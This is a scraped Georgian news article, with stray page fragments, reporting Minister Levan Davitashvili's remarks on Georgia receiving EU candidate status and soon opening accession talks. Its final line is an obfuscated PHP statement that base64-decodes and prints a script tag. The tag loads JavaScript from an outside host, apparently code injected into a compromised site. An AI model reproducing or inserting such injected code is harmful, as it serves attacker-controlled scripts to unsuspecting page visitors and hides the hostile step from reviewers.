celsiusi
ავერსი საქკაბელი

"ჩვენ საბოლოოდ მივიღეთ კანდიდატის სტატუსი და გაწევრიანებაზე მოლაპარაკებას მალე დავიწყებთ", - ამის შესახებ ეკონომიკისა და მდგრადი განვითარების მინისტრმა ლევან დავითაშვილმა დღეს გამართულ დარგობრივი ეკონომიკისა და ეკონომიკური პოლიტიკის კომიტეტის სხდომაზე განაცხადა.

ეკონომიკისა და მდგრადი განვითარების მინისტრის განცხადებით, ევროკავშირში გაწევრიანების შესახებ მოლაპარაკებები მალე დაიწყება და ეს პროცესი ქვეყნისთვის ძალიან მნიშვნელოვანი იქნება.

"საქართველომ ღირსეულად შეძლო კანდიდატის სტატუსის მოპოვება და ქვეყანა ევროპული ინტეგრაციის გზაზე სვლას აგრძელებს. ჩვენი ხელისუფლების პირობებში, როგორც არასდროს, ისე გვაქვს დაახლოება ევროკავშირთან და, როგორც არასდროს, პირველად გაჩნდა რეალური შანსი საქართველოს ევროკავშირში სრულფასოვანი წევრობის, რაც მიზანმიმართული და დიდი სამუშაოს გაწევას მოითხოვს, რათა საბოლოოდ გავწევრიანდეთ ევროკავშირში. გაწევრიანებას ისევე შევძლებთ, როგორც შევძელით ევროკავშირთან ვიზალიბერალიზაცია, შევძელით თავისუფალი ვაჭრობის შეთანხმების მიღწევა, ასოცირების ფარგლებში უამრავი რეფორმის წარმატებით წარმართვა და ა.შ., ჩვენ საბოლოოდ მივიღეთ კანდიდატის სტატუსი და გაწევრიანებაზე მოლაპარაკებას მალე დავიწყებთ, ეს პროცესი ძალიან მნიშვნელოვანი იქნება", - დასძინა ლევან დავითაშვილმა.

ინფორმაციისთვის: 14 დეკემებრს ევროპულმა საბჭომ საქართველოსთვის კანდიდატის სტატუსის მინიჭების გადაწყვეტილება მიიღო და საქართველო ევროკავშირის წევრობის კანდიდატი ქვეყანა გახდა.

206
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");